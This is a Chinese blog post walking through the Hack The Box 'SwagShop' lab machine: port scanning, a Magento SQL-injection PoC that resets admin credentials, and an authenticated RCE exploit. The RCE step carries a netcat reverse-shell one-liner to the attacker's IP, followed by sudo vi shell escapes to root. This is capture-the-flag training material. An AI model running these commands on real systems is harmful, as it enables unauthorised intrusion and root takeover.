【Hack The Box】linux练习-- SwagShop

最新推荐文章于 2024-07-25 18:05:44 发布
最新推荐文章于 2024-07-25 18:05:44 发布
阅读量323 收藏
点赞数 1
分类专栏: Hack The Box 文章标签: linux 服务器 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_65527369/article/details/127931895
版权

HTB 学习笔记

【Hack The Box】linux练习-- SwagShop

🔥系列专栏:Hack The Box
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年11月17日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!

文章目录

在这里插入图片描述

信息收集

22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 b6:55:2b:d2:4e:8f:a3:81:72:61:37:9a:12:f6:24:ec (RSA)
|   256 2e:30:00:7a:92:f0:89:30:59:c1:77:56:ad:51:c0:ba (ECDSA)
|_  256 4c:50:d5:f2:70:c5:fd:c4:b2:f0:bc:42:20:32:64:34 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Home page
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

80

需要添加hosts,在url显现出了
在这里插入图片描述gedit /etc/hosts
在这里插入图片描述
而后我们发现这是一个购物网站
具体功能点没有发现有什么
在这里插入图片描述搜索一下开源cms
在这里插入图片描述我想知道版本信息

在这里插入图片描述看到一个应该是插件的更新日志吧
先放着

THIS IS A METAPACKAGE FOR UPGRADE FROM 0.9 TO 1.0

Mage_Core_Modules

  • Mage_Core_Adminhtml
  • Interface_Adminhtml_Default
  • Interface_Frontend_Default
  • Interface_Install_Default
gobuster dir -u http://swagshop.htb/index.php/ -x php -w /usr/share/dirb/wordlists/common.txt

可以深度扫描
也可以习惯性的访问一下admin页面,果然有
但是弱口令无效

在这里插入图片描述因为网站底部显示这个是2014年,于是我去搜历史版本发布时间
在这里插入图片描述
两个版本,一个是1.9一个是1.14
在这里插入图片描述但是37811我们用不了,他需要认证,需要我们提供用户账号密码
于是我找到了一个exp
如下,可以直接修改后台账号密码

https://github.com/joren485/Magento-Shoplift-SQLI/blob/master/poc.py

在这里插入图片描述后台账号密码已经成功修改
在这里插入图片描述

现在我已经拿到了登陆凭据,我可以利用刚才的那个exp了

按照如下利用

python %s <target> <argument>\nExample: python %s http://localhost \"uname -a\""

但是我们在这之前还要先去修改一下py

在这里插入图片描述这个是我们刚才目录扫描扫出来的
时间戳按照提示去找即可

在这里插入图片描述
在这里插入图片描述在这里插入图片描述

python2 37811.py 'http://swagshop.htb/index.php/admin' "uname -a"

在这里插入图片描述
在这里插入图片描述是的,我也不知道这个错误的产生以及如何解决,但我知道“如果解决不了问题,那就解决产生问题的人”

直接把报错的那一行删掉
在这里插入图片描述

python2 37811.py 'http://swagshop.htb/index.php/admin' "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.7 9001 >/tmp/f"

python -c 'import pty;pty.spawn("/bin/bash")'. python3也有效。
Ctrl-z 到后台 shell。 在本地提示下, stty raw -echo.
fg将外壳带回前面。
reset重新初始化终端。 如果提示输入终端类型,请输入 screen.
在重置外壳中, export TERM=screen.

www-data@swagshop:/home/haris$ sudo -l
Matching Defaults entries for www-data on swagshop:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on swagshop:
    (root) NOPASSWD: /usr/bin/vi /var/www/html/*

sudo /usr/bin/vi /var/www/html/…/…/…/root/root.txt

二进制提权

sudo vi /var/www/html/a -c ':!/bin/sh'
或者
sudo vi -c ':!/bin/sh' /dev/null
人间体佐菲
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
hackthebox-swagshop(考点:magento安全 & vi提权)
冬萍子癸水
04-11 517
nmap 打开80,这是个网站,搜一下可以看到登录框。既然有magento的logo。不妨先查下什么是mangento 既然是个著名的电商系统,可以搜一下漏洞 有很多,因为py方便,就选择py,且37977.py前面似乎没写版本要求,可能这个更通用些,就试这个 打开看看,做点修改,把网址改成靶机的网址 运行,报错,根据报错提示,我直接把非code部分都删了 再运行,搞定,生成一个管理员账户 ...
Hack the box靶机 Swagshop
菜浪马废的博客
05-22 425
本来想按照顺序 做friendzone的 看看难度 剩下的四个里 他应该最难 还是往后面放一放吧 想想昨天的那个tartarsauce 我都要崩溃了 ![在这里插入图片描述](https://img-blog.csdnimg.cn/202005221558129.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM4MDA1ODU0,size
靶机渗透_hackthebox__swagshop -3
qq_34717555的博客
11-11 1157
在靶场里逛了一圈这个觉得这个主机评论难度并不高 简单和中等都有 简单较多linux 环境 获得ip10.10.10.140 拿到IP 啥也不说先扫一下 # Nmap 7.70 scan initiated Mon Jun 10 17:11:48 2019 as: 10.10.10.140 Nmap scan report for bogon (10.10.10.140) Host is...
【HTB系列】Swagshop
大方子
10-04 1973
靶机介绍 靶机IP:10.10.10.140 kali:10.10.12.69 先用nmap来对靶机进行探测 nmap -sC -sV -T 5 -oA Swagshop.nmap 10.10.10.140 扫描结果: # Nmap 7.80 scan initiated Fri Oct 4 13:24:03 2019 as: nmap -sC -sV -T 5 -oA Swagshop.nm...
HTB靶机系列-SwagShop
蚁景网安学院
07-16 688
介绍今天给大家带来的是一个HTB(hackthebox)的靶机—SwagShop,这是一个easy级别的linux系统的靶机,所以主要是对枚举,信息收集等手段的考察。对OSCP感兴趣的同...
Hack The Boxlinux练习-- Nineveh
人间体佐菲的博客
11-09 828
Hack The Boxlinux练习-- Nineveh
Hack The BoxLinux练习-- Luanne
人间体佐菲的博客
11-27 561
Hack The BoxLinux练习-- Luanne
Hack The Boxlinux练习-- Poison
人间体佐菲的博客
11-10 980
Hack The Boxlinux练习-- Poison
HackTheBox-Writes-Ups:HackTheBox CTFC挑战写作
03-20
【标题】"HackTheBox-Writes-Ups:HackTheBox CTFC挑战写作"涉及的是一个网络安全领域的活动,其中“HackTheBox”是一个知名的在线平台,它提供了模拟黑客攻击的环境来提升安全专业人员的技能。CTF(Capture The Flag...
Hack-the-Box-OSCP-Preparation:Hack-the-Box-OSCP-Preparation
03-20
介绍你好呀!如果您不认识我,我叫Rana Khalil,然后按Twitter句柄 。在花了将近八个月的时间,攻读了Offensive Security Certified Professional(OSCP)认证后,我很高兴地宣布我已获得OSCP官方认证!...
Hackthebox e Vulnhub - Dicas e Truques.pdf
10-06
在这个领域,两个知名的在线平台是Hackthebox和Vulnhub,它们提供虚拟环境供用户实践和提升渗透测试技能。这份PDF文档作者Joas Antonio分享了一些初学者在接触这些平台时可能会发现有用的技巧和策略。 首先,对于...
Stego-Challenges-HackTheBox-Write-Ups:Hack The Box带来的Stego挑战| Walkthoughs写ups
03-21
在IT安全领域,尤其是黑客挑战平台如Hack The Box(HTB)中,"Stego"是一种常见的挑战类型,它涉及到隐藏信息的技术,通常被称为隐写术。隐写术是一种利用图像、音频、文本等载体秘密传输信息的方法。在这个特定的...
hackthebox注册教程
01-20
官方网址:https://www.hackthebox.eu/ hackthebox是一个靶场,听说和vulnhub很像,最近迷上了做靶场,于是就像去hackthebox看看,发现还是注册,而且注册好像还没有那么简单 在首页的最下面有个join,进行点击 发现...
Linux:进程信号(二.信号的保存与处理、递达、volatile关键字、SIGCHLD信号)
qq_74415153的博客
07-25 1163
1.信号保存 1.1递达、未决、阻塞等概念 1.2再次理解信号产生与保存 1.3信号集操作函数 sigset_t类型 sigprocmask系统调用 sigpending系统调用 2.信号的处理/递达 2.1信号处理时机与过程 2.2用户态和内核态 2.3再看进程地址空间 谁来运行OS 2.4信号的捕捉-sigaction()函数 3.补充知识 3.1可重入函数 3.2volatile关键字 3.3 SIGCHLD信号
Linux初学基本命令
yuan20010401的博客
07-25 72
1、rm 文件名称 删除多个文件多个目录需要用空格 删除根目录(rm -rf /*)1、touch 文件名字 用于linux创建文件 创建多个目录需要用空格隔开。2、mkdir 目录名称 用于创建文件夹 创建多个嵌套文件夹需要用/隔开。1、cp 当前文件 其他目录名称 拷贝文件夹需要在最后 -r。退出不保存时按Esc+:q!1、ls 查看当前目录下面的文件或者文件夹。2、more 文件名称 查看文件更多内容。1、mv 原文件路径 目标文件路径。退出保存时按Esc + :wq。
RV1126 Linux 系统,接外设,时好时坏(一)应该从哪些方面排查问题
最新发布
小灰灰的博客
07-25 114
Linux 系统中排查外设连接问题时,需要从硬件、软件、时序和协议等多个方面进行全面分析。逐步排查并记录每一步的测试结果,有助于快速定位问题的根源。解决 “时好时坏”的问题可能需要综合考虑多个因素,耐心细致的排查将会提高找到解决方案的效率。
Linux|多线程(三)
学习笔记
07-25 302
线程池是一种多线程处理形式,处理过程中它将被提交的任务分配给预先创建好的多个线程中的一个去执行。
hackthebox - reel
11-03
HackTheBox - Reel是一个在黑客社区非常受欢迎的虚拟机靶场。这个靶场的目标是通过渗透测试和攻击手法,找到并获得系统的管理员权限。靶场基于漏洞存在和网络安全问题,提供了一个真实的环境来练习和提升安全技能。 Reel虚拟机是以恶意软件传播为主题的,这是一个很常见但危险的网络攻击。在解决这个靶场时,你需要进行全面的信息搜集,发现可能的漏洞,并利用这些漏洞来控制系统。你还需要进行各种网络嗅探和流量分析操作,以便找到系统中的隐藏服务和登录凭证。 在攻击过程中,你需要利用各种漏洞包括未经授权的访问和远程执行代码等。还需要理解和使用不同的入侵技术,例如命令注入和文件上传等。此外,你可能还需要对恶意软件的分析和行为进行深入研究,以了解其运行机制。 HackTheBox - Reel不仅测试了你的渗透测试技能,而且还促使你加强对恶意软件攻击和防护的了解。同时,这个靶场还有很多高级技术和技巧需要掌握。通过挑战这样的虚拟机,你可以提高你的安全意识和技能,以应对更复杂和高级的网络攻击。 总之,HackTheBox - Reel是一个非常有挑战性的虚拟机靶场,通过攻击和渗透测试,你将提高你的安全技能,并了解到如何防范和对抗恶意软件传播。这是一个很好的方式来锻炼和提升你的网络安全技术。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

人间体佐菲

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值